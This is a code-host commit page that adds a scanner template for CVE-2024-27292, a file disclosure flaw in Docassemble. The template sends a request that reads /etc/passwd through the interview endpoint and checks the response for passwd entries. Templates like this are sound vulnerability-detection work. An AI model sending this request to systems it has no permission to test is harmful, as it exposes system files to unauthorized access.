Create CVE-2024-27292.yaml
parent
425160439c
commit
b8f580fb67
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2024-27292
|
||||
|
||||
info:
|
||||
name: Sensitive File Disclosure via Interview Endpoint
|
||||
author: johnk3r
|
||||
severity: high
|
||||
description: Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
|
||||
reference:
|
||||
- https://tantosec.com/blog/docassemble/
|
||||
- https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
|
||||
tags: lfi,docassemble,cve,cve2024
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/interview?i=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "nobody:[x*]:65534:65534"
|
||||
- "root:.*:0:0:"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 501
|
Loading…
Reference in New Issue